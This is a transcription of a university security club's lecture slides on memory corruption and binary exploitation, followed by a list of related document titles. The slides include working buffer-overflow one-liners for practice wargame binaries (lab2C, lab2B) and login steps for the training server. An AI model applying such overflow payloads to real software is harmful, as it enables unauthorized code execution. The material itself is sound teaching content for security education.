Security & Exploitation
|
|
|
- Mark Neil Parrish
- 10 years ago
- Views:
Transcription
1 Security & Exploitation Operating Systems Spring 2015 RPISEC - 05/11/2015 OS Security 1
2 whoami Markus Gaasedelen B.S. Computer Science 15 Security Enthusiast I like to hack things President of RPISEC RPISEC - 05/11/2015 OS Security 2
3 What is RPISEC? The Computer Security RPI The leading authority on campus for any and all things computer security related We compete in hacking competitions known as CTFs (Capture The Flag) and we re very good at them RPISEC - 05/11/2015 OS Security 3
4 CSAW 2014 Finals RPISEC - 05/11/2015 OS Security 4
5 CSAW 2014 Finals RPISEC - 05/11/2015 OS Security 5
6 CSAW 2014 Awards RPISEC - 05/11/2015 OS Security 6
7 What is RPISEC? The Computer Security RPI The leading authority on campus for any and all things computer security related We compete in hacking competitions known as CTFs (Capture The Flag) and we re very good at them We teach cool and applicable security skills at our weekly meetings 5-7pm Fridays, DCC 324 RPISEC - 05/11/2015 OS Security 7
8 Weekly Meetings RPISEC - 05/11/2015 OS Security 8
9 let s get rolling WHAT IS SECURITY? RPISEC - 05/11/2015 OS Security 9
10 RPISEC - 05/11/2015 OS Security 10
11 What is Security? Security == Hacking politically correct Cyber is the buzzword Very technical and rewarding challenges Rarely touched upon in academia Many different categories of security RPISEC - 05/11/2015 OS Security 11
12 Categories of Security Cryptography Web Security Vulnerability Research Binary Exploitation Reverse Engineering Malware Analysis Systems Security Embedded Hardware Hacking Network Security Digital Forensics Physical Security Pentesting RPISEC - 05/11/2015 OS Security 12
13 Categories of Security Cryptography Web Security Vulnerability Research Binary Exploitation Reverse Engineering Malware Analysis Systems Security Embedded Hardware Hacking Network Security Digital Forensics Physical Security Pentesting The kind of stuff I ll talk about today RPISEC - 05/11/2015 OS Security 13
14 MEMORY CORRUPTION & BINARY EXPLOITATION RPISEC - 05/11/2015 OS Security 14
15 Defining Binary Exploitation Binary Exploitation Carefully leveraging bugs in an application to cause extreme but controlled failure RPISEC - 05/11/2015 OS Security 15
16 Binary Exploitation extreme but controlled failure RPISEC - 05/11/2015 OS Security 16
17 Binary Exploitation extreme but controlled failure RPISEC - 05/11/2015 OS Security 17
18 Binary Exploitation extreme but controlled failure But what does that even mean? RPISEC - 05/11/2015 OS Security 18
19 Visualizing Exploitation RPISEC - 05/11/2015 OS Security 19
20 Visualizing Exploitation RPISEC - 05/11/2015 OS Security 20
21 Visualizing Exploitation RPISEC - 05/11/2015 OS Security 21
22 Visualizing Exploitation RPISEC - 05/11/2015 OS Security 22
23 Visualizing Exploitation RPISEC - 05/11/2015 OS Security 23
24 Visualizing Exploitation wat RPISEC - 05/11/2015 OS Security 24
25 Super Mario World Sillyness RPISEC - 05/11/2015 OS Security 25
26 Defining Binary Exploitation Binary Exploitation Carefully leveraging bugs in an application to cause extreme but controlled failure Exploitation requires intimate knowledge of the language, compiler, and the machine RPISEC - 05/11/2015 OS Security 26
27 Language Pyramid RPISEC - 05/11/2015 OS Security 27
28 The Unexciting Languages Binary exploitation isn t really a thing for managed or scripting languages C#,.NET, JavaScript, Lua, Python, etc RPISEC - 05/11/2015 OS Security 28
29 The Unexciting Languages RPISEC - 05/11/2015 OS Security 29
30 The Unexciting Languages Binary exploitation isn t really a thing for managed or scripting languages C#,.NET, JavaScript, Lua, Python, etc Slower, automates a lot of stuff for you Driving an automatic RPISEC - 05/11/2015 OS Security 30
31 The C Language C is a low level language RPISEC - 05/11/2015 OS Security 31
32 The C Language C is a low level language Compiles straight to machine code Very fast RPISEC - 05/11/2015 OS Security 32
33 The C Language RPISEC - 05/11/2015 OS Security 33
34 The C Language C is a low level language Compiles straight to machine code Very fast Very fine control over the machine and memory It s like driving a manual! RPISEC - 05/11/2015 OS Security 34
35 The C Language C is a low level language Compiles straight to machine code Very fast Very fine control over the machine and memory It s like driving a manual! Easy to do stupid things RPISEC - 05/11/2015 OS Security 35
36 RPISEC - 05/11/2015 OS Security 36
37 Going Deeper RPISEC - 05/11/2015 OS Security 37
38 Pulling Back the Curtain there's way too much information to decode the Matrix. You get used to it, though. Your brain does the translating. I don't even see the code. All I see is blonde, brunette, redhead. -Cypher, The Matrix RPISEC - 05/11/2015 OS Security 38
39 let s dive right in and try breaking some stuff WELCOME TO THE WARZONE RPISEC - 05/11/2015 OS Security 39
40 warzone.rpis.ec ssh username/password lab2c / RPISEC - 05/11/2015 OS Security 40
41 Getting Started / Tips cd /levels/lab2./lab2c AAAA python c print A *20 gdb./lab2c run In GDB: Info functions Info registers i r disassemble <function> disas main breakpoint <function> b main breakpoint * <address> b * 0x RPISEC - 05/11/2015 OS Security 41
42 Stack Overview The stack is a region of memory for a program to maintain function variables, arguments, and control flow metadata during execution RPISEC - 05/11/2015 OS Security 42
43 Understanding the Stack RPISEC - 05/11/2015 OS Security 43
44 Understanding the Stack RPISEC - 05/11/2015 OS Security 44
45 Corrupting the Stack RPISEC - 05/11/2015 OS Security 45
46 PWNING the Stack RPISEC - 05/11/2015 OS Security 46
47 Endianess Endianess How data is stored in memory Modern computers are generally little endian little end in Endianess can be confusing, and I don t want to get into the details 0x stored as 0x44, 0x43, 0x42, 0x41 0xdeadbeef stored as 0xef, 0xbe, 0xad, 0xde RPISEC - 05/11/2015 OS Security 47
48 lab2c Exploit./lab2C $(python -c 'print "A"*15 + "\xef\xbe\xad\xde"') RPISEC - 05/11/2015 OS Security 48
49 Bend it like Beckham UNDERSTANDING CONTROL FLOW RPISEC - 05/11/2015 OS Security 49
50 Example ELF / EXE in Memory Runtime Memory 0x Start of memory Libraries (libc) ELF Executable.text segment 0x Start of.text Segment.data segment Heap Stack 0xbfff0000 Top of stack 0xFFFFFFFF End of memory RPISEC - 05/11/2015 OS Security 50
51 Example ELF / EXE in Memory Runtime Memory Libraries (libc) ELF Executable.text segment Executable code.data segment.text segment Heap Stack RPISEC - 05/11/2015 OS Security 51
52 Example ELF / EXE in Memory Runtime Memory Libraries (libc) ELF Executable.text segment.data segment Executable code EIP.text segment Heap Stack RPISEC - 05/11/2015 OS Security 52
53 Example ELF / EXE in Memory Runtime Memory Libraries (libc) ELF Executable.text segment.data segment Executable code EIP.text segment Heap Stack RPISEC - 05/11/2015 OS Security 53
54 Example ELF / EXE in Memory Runtime Memory Libraries (libc) ELF Executable.text segment.data segment Executable code EIP.text segment Heap Stack RPISEC - 05/11/2015 OS Security 54
55 Example ELF / EXE in Memory Runtime Memory Libraries (libc) ELF Executable.text segment.data segment Executable code EIP.text segment Heap Stack RPISEC - 05/11/2015 OS Security 55
56 Example ELF / EXE in Memory Runtime Memory Libraries (libc) ELF Executable.text segment.data segment Executable code EIP.text segment Heap Stack RPISEC - 05/11/2015 OS Security 56
57 Example ELF / EXE in Memory Runtime Memory Libraries (libc) ELF Executable.text segment Executable code.data segment.text segment EIP Heap Stack RPISEC - 05/11/2015 OS Security 57
58 Example ELF / EXE in Memory Runtime Memory Libraries (libc) EIP ELF Executable.text segment.data segment.text segment Heap Stack RPISEC - 05/11/2015 OS Security 58
59 Example ELF / EXE in Memory Runtime Memory Libraries (libc) ELF Executable.text segment.data segment.text segment EIP Heap Stack RPISEC - 05/11/2015 OS Security 59
60 Example ELF / EXE in Memory Runtime Memory Libraries (libc) ELF Executable.text segment Executable code.data segment.text segment Heap EIP Stack RPISEC - 05/11/2015 OS Security 60
61 Example ELF / EXE in Memory Runtime Memory Libraries (libc) EIP ELF Executable.text segment.data segment.text segment Heap Stack RPISEC - 05/11/2015 OS Security 61
62 How Calling Works EIP RPISEC - 05/11/2015 OS Security 62
63 How Calling Works EIP RPISEC - 05/11/2015 OS Security 63
64 How Calling Works EIP RPISEC - 05/11/2015 OS Security 64
65 How Calling Works EIP RPISEC - 05/11/2015 OS Security 65
66 How Calling Works EIP RPISEC - 05/11/2015 OS Security 66
67 How Calling Works EIP RPISEC - 05/11/2015 OS Security 67
68 Returning EIP RPISEC - 05/11/2015 OS Security 68
69 Returning EIP RPISEC - 05/11/2015 OS Security 69
70 Returning EIP RPISEC - 05/11/2015 OS Security 70
71 Returning EIP RPISEC - 05/11/2015 OS Security 71
72 Returning EIP RPISEC - 05/11/2015 OS Security 72
73 Now that you know how it works OWNING CONTROL FLOW RPISEC - 05/11/2015 OS Security 73
74 Stack Smashing EIP RPISEC - 05/11/2015 OS Security 74
75 Stack Smashing EIP RPISEC - 05/11/2015 OS Security 75
76 Stack Smashing EIP RPISEC - 05/11/2015 OS Security 76
77 Returning EIP RPISEC - 05/11/2015 OS Security 77
78 Returning home EIP SEGFAULT 0x RPISEC - 05/11/2015 OS Security 78
79 RPISEC - 05/11/2015 OS Security 79
80 If your program simply segfaulted, consider yourself lucky. -Chuck Stewart RPISEC - 05/11/2015 OS Security 80
81 Redirecting Control Flow Overwrite with a code address EIP RPISEC - 05/11/2015 OS Security 81
82 warzone.rpis.ec SSH in as lab2b use the password you got from solving lab2c RPISEC - 05/11/2015 OS Security 82
83 RPISEC - 05/11/2015 OS Security 83
84 lab2b Exploit./lab2B $(python -c 'print "A"*27 + "\x7d\x84\x04\x08" + "B"*4 + "\xa0\x85\x04\x08"') RPISEC - 05/11/2015 OS Security 84
85 Modern Protections Data Execution Prevention (DEP) Address Space Layout Randomization (ASLR) Stack Cookies (Canaries) Read Only Relocation (RELRO) FORTIFY_SOURCE These only make things harder, not impossible RPISEC - 05/11/2015 OS Security 85
86 Those were more academic challenges BREAKING SOMETHING MODERN RPISEC - 05/11/2015 OS Security 86
87 Exploitation on Windows 8.1 (x64) CSAW 2014 LINKS.EXE RPISEC - 05/11/2015 OS Security 87
88 links.exe Challenge from the CSAW 2014 CTF Finals 64bit exploitation on Windows 8.1 Basically all protections are on by default No source code, lots of x64 reversing Doubly linked circular list implementation pushfront, pushback, delete, copy, print, sort RPISEC - 05/11/2015 OS Security 88
89 reversing is tedious RPISEC - 05/11/2015 OS Security 89
90 Windows 8.1 Exploitation (x64) CSAW 2014 LINKS.EXE - DEMO RPISEC - 05/11/2015 OS Security 90
91 CSAW 2014 Finals RPISEC - 05/11/2015 OS Security 91
92 Wrapping up Binary Exploitation You might consider yourself a *rockstar* programmer, but you probably know little to nothing about secure coding practices or the implications of your mistakes Compilers go out of their way to prevent your bugs from causing catastrophic failure Because your program doesn t appear to segfault or crash, doesn t mean it is bug free or without vulnerabilities Binary exploitation is nothing like standard software development - I truly think of it as an art RPISEC - 05/11/2015 OS Security 92
93 welcome to the real world JOB OPPORTUNITIES RPISEC - 05/11/2015 OS Security 93
94 so many jobs Typical titles / positions Information Security Analyst / Engineer Security Software Engineer Vulnerability Research Engineer Web Application Security Engineer Computer Network Operations Threat & Incident Response Engineer Product Security Reverse Engineer Malware Analyst / Reverse Engineer RPISEC - 05/11/2015 OS Security 94
95 Entering the Job Market There is a major shortage of qualified security individuals in industry Skilled in security & have a B.S. in CS? Government, Contractors, FFRDCs $70k $100k Private / Commercial $100k?? Anything less and you re missing out RPISEC - 05/11/2015 OS Security 95
96 One Great Adventure RPISEC - 05/11/2015 OS Security 96
97 RPI RPISEC - 05/11/2015 OS Security 97
98 RPI Malware Analysis Fall 2015 Coming soon! Modern Binary Exploitation Spring Hardware Reverse Engineering Spring Malware Analysis Spring Secure Software Principles Spring RPISEC - 05/11/2015 OS Security 98
99 Questions? gaasem [at] rpi.edu irc.rpis.ec 6667 RPISEC - 05/11/2015 OS Security 99
Modern Binary Exploitation Course Syllabus
Modern Binary Exploitation Course Syllabus Course Information Course Title: Modern Binary Exploitation Course Number: CSCI 4968 Credit Hours: 4 Semester / Year: Spring 2015 Meeting Days: Tuesday/Friday
Bypassing Memory Protections: The Future of Exploitation
Bypassing Memory Protections: The Future of Exploitation Alexander Sotirov [email protected] About me Exploit development since 1999 Research into reliable exploitation techniques: Heap Feng Shui in JavaScript
Why should I care about PDF application security?
Why should I care about PDF application security? What you need to know to minimize your risk Table of contents 1: Program crashes present an opportunity for attack 2: Look for software that fully uses
Exploiting nginx chunked overflow bug, the undisclosed attack vector
Exploiting nginx chunked overflow bug, the undisclosed attack vector Long Le [email protected] About VNSECURITY.NET CLGT CTF team 2 VNSECURITY.NET In this talk Nginx brief introduction Nginx chunked
Custom Penetration Testing
Custom Penetration Testing Compromising a Vulnerability through Discovery and Custom Exploitation Stephen Sims Advanced Penetration Testing - 2009 SANS 1 Objectives Penetration Testing Precompiled Tools
OWASP Spain Barcelona 2014
OWASP Spain Barcelona 2014 ME & VULNEX Simon Roses Femerling Founder & CEO, VULNEX www.vulnex.com @simonroses @vulnexsl Former Microsoft, PwC, @Stake Black Hat, RSA, OWASP, SOURCE, AppSec, DeepSec, TECHNET,
GDB Tutorial. A Walkthrough with Examples. CMSC 212 - Spring 2009. Last modified March 22, 2009. GDB Tutorial
A Walkthrough with Examples CMSC 212 - Spring 2009 Last modified March 22, 2009 What is gdb? GNU Debugger A debugger for several languages, including C and C++ It allows you to inspect what the program
Bypassing Browser Memory Protections in Windows Vista
Bypassing Browser Memory Protections in Windows Vista Mark Dowd & Alexander Sotirov [email protected] [email protected] Setting back browser security by 10 years Part I: Introduction Thesis Introduction
SECURITY B-SIDES: ATLANTA STRATEGIC PENETRATION TESTING. Presented by: Dave Kennedy Eric Smith
SECURITY B-SIDES: ATLANTA STRATEGIC PENETRATION TESTING Presented by: Dave Kennedy Eric Smith AGENDA Penetration Testing by the masses Review of current state by most service providers Deficiencies in
ASL IT SECURITY XTREME XPLOIT DEVELOPMENT
ASL IT SECURITY XTREME XPLOIT DEVELOPMENT V 2.0 A S L I T S e c u r i t y P v t L t d. Page 1 Overview: The most dangerous threat is the one which do not have a CVE. Until now developing reliable exploits
CS5460: Operating Systems
CS5460: Operating Systems Lecture 13: Memory Management (Chapter 8) Where are we? Basic OS structure, HW/SW interface, interrupts, scheduling Concurrency Memory management Storage management Other topics
Malware in the clouds. Building the Undetectable Bot
Malware in the clouds Building the Undetectable Bot Who am I? Philip Porter nullbnx twitter [email protected] Ex-Intel Analyst, Reverse Engineer/Forensic Analyst, studier of advanced threats, Red Teamer,
Defense in Depth: Protecting Against Zero-Day Attacks
Defense in Depth: Protecting Against Zero-Day Attacks Chris McNab FIRST 16, Budapest 2004 Agenda Exploits through the ages Discussion of stack and heap overflows Common attack behavior Defense in depth
Unix Security Technologies. Pete Markowsky <peterm[at] ccs.neu.edu>
![Unix Security Technologies. Pete Markowsky <peterm[at] ccs.neu.edu>](/thumbs/32/15517621.jpg "Unix Security Technologies. Pete Markowsky <peterm[at] ccs.neu.edu>")
Unix Security Technologies Pete Markowsky What is this about? The goal of this CPU/SWS are: Introduce you to classic vulnerabilities Get you to understand security advisories Make
Real-time Debugging using GDB Tracepoints and other Eclipse features
Real-time Debugging using GDB Tracepoints and other Eclipse features GCC Summit 2010 2010-010-26 [email protected] Summary Introduction Advanced debugging features Non-stop multi-threaded debugging
Hacking your perimeter. Social-Engineering. Not everyone needs to use zero. David Kennedy (ReL1K) http://www.secmaniac.com Twitter: Dave_ReL1K
Hacking your perimeter. Social-Engineering Not everyone needs to use zero days David Kennedy (ReL1K) http://www.secmaniac.com Twitter: Dave_ReL1K About the speaker Wrote the Social-Engineer Toolkit (SET),
A White Paper from AccessData Group. Cerberus. Malware Triage and Analysis
A White Paper from AccessData Group Cerberus Malware Triage and Analysis What is Cerberus? Cerberus is the first-ever automated reverse engineering tool designed to show a security analyst precisely what
TAMS Analyzer 3 and Multi-User Projects. By Matthew Weinstein
TAMS Analyzer 3 and Multi-User Projects By Matthew Weinstein 1 I. Introduction TAMS has always had multiple users in mind, ever since TA1 supported signed tags, i.e., tags that had the coder s initials
C# and Other Languages
C# and Other Languages Rob Miles Department of Computer Science Why do we have lots of Programming Languages? Different developer audiences Different application areas/target platforms Graphics, AI, List
Sandy. The Malicious Exploit Analysis. http://exploit-analysis.com/ Static Analysis and Dynamic exploit analysis. Garage4Hackers
Sandy The Malicious Exploit Analysis. http://exploit-analysis.com/ Static Analysis and Dynamic exploit analysis About Me! I work as a Researcher for a Global Threat Research firm.! Spoke at the few security
CS 40 Computing for the Web
CS 40 Computing for the Web Art Lee January 20, 2015 Announcements Course web on Sakai Homework assignments submit them on Sakai Email me the survey: See the Announcements page on the course web for instructions
Attacking Obfuscated Code with IDA Pro. Chris Eagle
Attacking Obfuscated Code with IDA Pro Chris Eagle Outline Introduction Operation Demos Summary 2 First Order Of Business MOVE UP AND IN! There is plenty of room up front I can't increase the font size
CS3235 - Computer Security Thirteenth topic: System attacks. defenses
Overflows... Security case studies CS3235 - Computer Security Thirteenth topic: System attacks and defenses Hugh Anderson National University of Singapore School of Computing March/April, 2016 Hugh Anderson
A Dozen Years of Shellphish From DEFCON to the Cyber Grand Challenge
A Dozen Years of Shellphish From DEFCON to the Cyber Grand Challenge Antonio Bianchi [email protected] University of California, Santa Barbara HITCON Enterprise August 27th, 2015 Agenda Shellphish The
I Control Your Code Attack Vectors Through the Eyes of Software-based Fault Isolation. Mathias Payer, ETH Zurich
I Control Your Code Attack Vectors Through the Eyes of Software-based Fault Isolation Mathias Payer, ETH Zurich Motivation Applications often vulnerable to security exploits Solution: restrict application
COMP 112 Assignment 1: HTTP Servers
COMP 112 Assignment 1: HTTP Servers Lead TA: Jim Mao Based on an assignment from Alva Couch Tufts University Due 11:59 PM September 24, 2015 Introduction In this assignment, you will write a web server
Building the Next Generation of Computer Security Professionals. Chris Simpson
Building the Next Generation of Computer Security Professionals Chris Simpson Overview Why teach computer security to high school students Deciding what to teach What I taught Community Support Lessons
CEN 559 Selected Topics in Computer Engineering. Dr. Mostafa H. Dahshan KSU CCIS [email protected]
CEN 559 Selected Topics in Computer Engineering Dr. Mostafa H. Dahshan KSU CCIS [email protected] Access Control Access Control Which principals have access to which resources files they can read
Real-Time Analytics on Large Datasets: Predictive Models for Online Targeted Advertising
Real-Time Analytics on Large Datasets: Predictive Models for Online Targeted Advertising Open Data Partners and AdReady April 2012 1 Executive Summary AdReady is working to develop and deploy sophisticated
Payment Card Industry (PCI) Terminal Software Security. Best Practices
Payment Card Industry (PCI) Terminal Software Security Best Version 1.0 December 2014 Document Changes Date Version Description June 2014 Draft Initial July 23, 2014 Core Redesign for core and other August
Embedded devices as an attack vector
[email protected] Computer Laboratory University of Cambridge 21C3 1 Embedded devices Threat model Aims 2 Why use embedded devices? Why is using embedded devices hard? Reverse engineering techniques
Eugene Tsyrklevich. Ozone HIPS: Unbreakable Windows
Eugene Tsyrklevich Eugene Tsyrklevich has an extensive security background ranging from designing and implementing Host Intrusion Prevention Systems to training people in research, corporate, and military
10 Ways to Not Get Caught Hacking On Your Mac
10 Ways to Not Get Caught Hacking On Your Mac Three18 is a Comprehensive Technology Solutions Provider Apple Certified Partner Microsoft Gold Partner Symantec Security Solutions Partner Novell and RedHat
Software Vulnerability Exploitation Trends. Exploring the impact of software mitigations on patterns of vulnerability exploitation
Software Vulnerability Exploitation Trends Exploring the impact of software mitigations on patterns of vulnerability exploitation Software Vulnerability Exploitation Trends This document is for informational
Hotpatching and the Rise of Third-Party Patches
Hotpatching and the Rise of Third-Party Patches Alexander Sotirov [email protected] BlackHat USA 2006 Overview In the next one hour, we will cover: Third-party security patches _ recent developments
How To Use Powerhell For Security Research
PowerShell David Kennedy (ReL1K) Josh Kelley (Winfang) http://www.secmaniac.com Twitter: dave_rel1k winfang98 About Josh Security Analyst with a Fortune 1000 --- Works with Dave Heavy experience in penetration
Secrets of Vulnerability Scanning: Nessus, Nmap and More. Ron Bowes - Researcher, Tenable Network Security
Secrets of Vulnerability Scanning: Nessus, Nmap and More Ron Bowes - Researcher, Tenable Network Security 1 About me Ron Bowes (@iagox86) My affiliations (note: I m here to educate, not sell) 2 SkullSpace
Format string exploitation on windows Using Immunity Debugger / Python. By Abysssec Inc WwW.Abysssec.Com
Format string exploitation on windows Using Immunity Debugger / Python By Abysssec Inc WwW.Abysssec.Com For real beneficiary this post you should have few assembly knowledge and you should know about classic
Software Vulnerabilities
Software Vulnerabilities -- stack overflow Code based security Code based security discusses typical vulnerabilities made by programmers that can be exploited by miscreants Implementing safe software in
Make a folder named Lab3. We will be using Unix redirection commands to create several output files in that folder.
CMSC 355 Lab 3 : Penetration Testing Tools Due: September 31, 2010 In the previous lab, we used some basic system administration tools to figure out which programs where running on a system and which files
90% of data breaches are caused by software vulnerabilities.
90% of data breaches are caused by software vulnerabilities. Get the skills you need to build secure software applications Secure Software Development (SSD) www.ce.ucf.edu/ssd Offered in partnership with
Securing ios Applications. Dr. Bruce Sams, OPTIMAbit GmbH
Securing ios Applications Dr. Bruce Sams, OPTIMAbit GmbH About Me President of OPTIMAbit GmbH Responsible for > 200 Pentests per Year Ca 50 ios Pentests and code reviews in the last two years. Overview
Buffer Overflows. Code Security: Buffer Overflows. Buffer Overflows are everywhere. 13 Buffer Overflow 12 Nov 2015
CSCD27 Computer and Network Security Code Security: Buffer Overflows 13 Buffer Overflow CSCD27 Computer and Network Security 1 Buffer Overflows Extremely common bug. First major exploit: 1988 Internet
Mobile Application Hacking for Android and iphone. 4-Day Hands-On Course. Syllabus
Mobile Application Hacking for Android and iphone 4-Day Hands-On Course Syllabus Android and iphone Mobile Application Hacking 4-Day Hands-On Course Course description This course will focus on the techniques
Advanced Internet Security
Advanced Internet Security (aka InetSec 2) 183.222 Lecturers Adrian Dabrowski Markus Kammerstetter Georg Merzdoznik Stefan Riegler Challenge Gurus Felix Winter Administrative Issues Mode Weekly lectures
Helping you avoid stack overflow crashes!
Helping you avoid stack overflow crashes! One of the toughest (and unfortunately common) problems in embedded systems is stack overflows and the collateral corruption that it can cause. As a result, we
Parallel Debugging with DDT
Parallel Debugging with DDT Nate Woody 3/10/2009 www.cac.cornell.edu 1 Debugging Debugging is a methodical process of finding and reducing the number of bugs, or defects, in a computer program or a piece
AdwareMedic. About AdwareMedic... 2. How to use AdwareMedic... 3. Frequently Asked Questions... 7. Version History... 9 License Agreement...
AdwareMedic http://www.adwaremedic.com [email protected] About AdwareMedic... 2 System Requirements... 2 Limitations... 2 How to use AdwareMedic... 3 Scan for Adware... 4 Optional items... 5 Firefox
Penetration Testing with Kali Linux
Penetration Testing with Kali Linux PWK Copyright 2014 Offensive Security Ltd. All rights reserved. Page 1 of 11 All rights reserved to Offensive Security, 2014 No part of this publication, in whole or
Incremental Backup Script. Jason Healy, Director of Networks and Systems
Incremental Backup Script Jason Healy, Director of Networks and Systems Last Updated Mar 18, 2008 2 Contents 1 Incremental Backup Script 5 1.1 Introduction.............................. 5 1.2 Design Issues.............................
University of Hull Department of Computer Science. Wrestling with Python Week 01 Playing with Python
Introduction Welcome to our Python sessions. University of Hull Department of Computer Science Wrestling with Python Week 01 Playing with Python Vsn. 1.0 Rob Miles 2013 Please follow the instructions carefully.
Hacking Medical Devices
Hacking Medical Devices Cloud Context #2 Blog: Florian Grunow Security Analyst ERNW in Heidelberg Team Lead: Pentest ERNW Academy Research: Medical Devices Connected Cars Conference: #3 Agenda Motivation
The Importance of a Data Backup and Disaster Recovery Plan
A The Importance of a Data Backup and Disaster Recovery Plan 1 There s just one thing as sickening to a business owner as experiencing a loss of data, which is knowing that loss was completely avoidable
Incorporating Cyber Threat Intelligence into Security Assessment Programs
Incorporating Cyber Threat Intelligence into Security Assessment Programs Security Assessment Team SATBLUE Identifying Vulnerabilities SATRed Simulating Threats Identifying what works and what needs working
Outline. hardware components programming environments. installing Python executing Python code. decimal and binary notations running Sage
Outline 1 Computer Architecture hardware components programming environments 2 Getting Started with Python installing Python executing Python code 3 Number Systems decimal and binary notations running
CS 155 Final Exam. CS 155: Spring 2013 June 11, 2013
CS 155: Spring 2013 June 11, 2013 CS 155 Final Exam This exam is open book and open notes. You may use course notes and documents that you have stored on a laptop, but you may NOT use the network connection
System Management. Leif Nixon. a security perspective 1/37
1/37 System Management a security perspective Leif Nixon 2/37 System updates Should we ever update the system? Some common update strategies: 1. If it works, don t touch it! 2. We pick and choose the most
Project 2: Penetration Testing (Phase II)
Project 2: Penetration Testing (Phase II) CS 161 - Joseph/Tygar November 17, 2006 1 Edits If we need to make clarifications or corrections to this document after distributing it, we will post a new version
Testing for Security
Testing for Security Kenneth Ingham September 29, 2009 1 Course overview The threat that security breaches present to your products and ultimately your customer base can be significant. This course is
How To Write A Design Document For Anorexic Css
Computer Science 161: Operating Systems How to write a Design Document CS161 Course Staff [email protected] January 22, 2013 1 Introduction Assignments 2, 3, and 4 require that you write and submit
Virtually Secure. a journey from analysis to remote root 0day on an industry leading SSL-VPN appliance
Virtually Secure a journey from analysis to remote root 0day on an industry leading SSL-VPN appliance Who am I? Tal Zeltzer Independent security researcher from Israel Reverse engineering (mostly embedded
How to Hold Virtual Office Hours
How to Hold Virtual Office Hours Thanks to technology, you can now help students troubleshoot bugs by observing or sharing control of their screen while chatting with them via IM or VOIP, no matter where
How to Outsource Without Being a Ninnyhammer
How to Outsource Without Being a Ninnyhammer 5 mistakes people make when outsourcing for profit By Jason Fladlien 2 Introduction The way everyone does outsourcing is patently wrong, and this report is
Unix Security Technologies: Host Security Tools. Peter Markowsky <peterm[at]ccs.neu.edu>
![Unix Security Technologies: Host Security Tools. Peter Markowsky <peterm[at]ccs.neu.edu>](/thumbs/27/12100752.jpg "Unix Security Technologies: Host Security Tools. Peter Markowsky <peterm[at]ccs.neu.edu>")
Unix Security Technologies: Host Security Tools Peter Markowsky Syllabus An Answer to last week s assignment Four tools SSP W^X PaX Systrace Last time You were assigned to get a
Software security. Buffer overflow attacks SQL injections. Lecture 11 EIT060 Computer Security
Software security Buffer overflow attacks SQL injections Lecture 11 EIT060 Computer Security Buffer overflow attacks Buffer overrun is another common term Definition A condition at an interface under which
CS 51 Intro to CS. Art Lee. September 2, 2014
CS 51 Intro to CS Art Lee September 2, 2014 Announcements Course web page at: http://www.cmc.edu/pages/faculty/alee/cs51/ Homework/Lab assignment submission on Sakai: https://sakai.claremont.edu/portal/site/cx_mtg_79055
Tools and Techniques to automate the discovery of Zero Day Vulnerabilities. A.K.A Fuzzing 101
Tools and Techniques to automate the discovery of Zero Day Vulnerabilities A.K.A Fuzzing 101 Agenda GEEKZONE Overview of fuzzing techniques Tutorials on specific open-source fuzzers Demonstrations DIY
MSc Computer Science Dissertation
University of Oxford Computing Laboratory MSc Computer Science Dissertation Automatic Generation of Control Flow Hijacking Exploits for Software Vulnerabilities Author: Sean Heelan Supervisor: Dr. Daniel
CSC230 Getting Starting in C. Tyler Bletsch
CSC230 Getting Starting in C Tyler Bletsch What is C? The language of UNIX Procedural language (no classes) Low-level access to memory Easy to map to machine language Not much run-time stuff needed Surprisingly
DropSmack: How cloud synchronization services render your corporate firewall worthless
DropSmack: How cloud synchronization services render your corporate firewall worthless Jake Williams [email protected] Please complete the Speaker Feedback Surveys. Feedback Surveys This will help
How Security Testing can ensure Your Mobile Application Security. Yohannes, CEHv8, ECSAv8, ISE, OSCP(PWK) Information Security Consultant
How Security Testing can ensure Your Mobile Application Security Yohannes, CEHv8, ECSAv8, ISE, OSCP(PWK) Information Security Consultant Once More Consulting & Advisory Services IT Governance IT Strategic
The Defense RESTs: Automation and APIs for Improving Security
The Defense RESTs: Automation and APIs for Improving Security Want to get better at security? Improve your operations and your development practices. The key is to centralize management, automate and test.
How To Protect Your Computer From Being Hacked By A Hacker (For A Fee)
Illuminating the Security Issues with Lights-Out Server Management Anthony J. Bonkoski J. Alex Halderman University of Michigan What is IPMI? Need to manage a massive cluster of servers? OS installs, monitoring,
A Parents' Guide to. Snapchat. 2013 ConnectSafely.org
A Parents' Guide to Snapchat 2013 ConnectSafely.org Top 5 Questions Parents Have About Snapchat 1. Why do kids love Snapchat? They love the spontaneity of it. It s been (rightfully) drummed into their
Red Hat. www.redhat.com. By Karl Wirth
Red Hat Enterprise Linux 5 Security By Karl Wirth Abstract Red Hat Enterprise Linux has been designed by, and for, the most security-conscious organizations in the world. Accordingly, security has always
Dongwoo Kim : Hyeon-jeong Lee s Husband
2/ 32 Who we are Dongwoo Kim : Hyeon-jeong Lee s Husband Ph.D. Candidate at Chungnam National University in South Korea Majoring in Computer Communications & Security Interested in mobile hacking, digital
Introduction. Application Security. Reasons For Reverse Engineering. This lecture. Java Byte Code
Introduction Application Security Tom Chothia Computer Security, Lecture 16 Compiled code is really just data which can be edit and inspected. By examining low level code protections can be removed and
WHITEPAPER. Nessus Exploit Integration
Nessus Exploit Integration v2 Tenable Network Security has committed to providing context around vulnerabilities, and correlating them to other sources, such as available exploits. We currently pull information
Bug hunting. Vulnerability finding methods in Windows 32 environments compared. FX of Phenoelit
Bug hunting Vulnerability finding methods in Windows 32 environments compared FX of Phenoelit The goal: 0day What we are looking for: Handles network side input Runs on a remote system Is complex enough
Hijacking Arbitrary.NET Application Control Flow. Topher Timzen
Hijacking Arbitrary.NET Application Control Flow Topher Timzen #whoami Topher Timzen Security Researcher, Intel Security Trainer @TTimzen TopherTimzen.com Overview.NET? Runtime Attacks Modify Control Flow
CEFNS Web Hosting a Guide for CS212
CEFNS Web Hosting a Guide for CS212 INTRODUCTION: TOOLS: In CS212, you will be learning the basics of web development. Therefore, you want to keep your tools to a minimum so that you understand how things
University Road Show 2015
University Road Show 2015 What we will cover Working in Cyber Security The Challenge The Prizes Hints & Tips Q&A Working in Cyber Security Life as a Cyber Security Professional Varied Valued Interesting
FORBIDDEN - Ethical Hacking Workshop Duration
Workshop Course Module FORBIDDEN - Ethical Hacking Workshop Duration Lecture and Demonstration : 15 Hours Security Challenge : 01 Hours Introduction Security can't be guaranteed. As Clint Eastwood once
Loophole+ with Ethical Hacking and Penetration Testing
Loophole+ with Ethical Hacking and Penetration Testing Duration Lecture and Demonstration: 15 Hours Security Challenge: 01 Hours Introduction Security can't be guaranteed. As Clint Eastwood once said,
Game Design From Concepts To Implementation
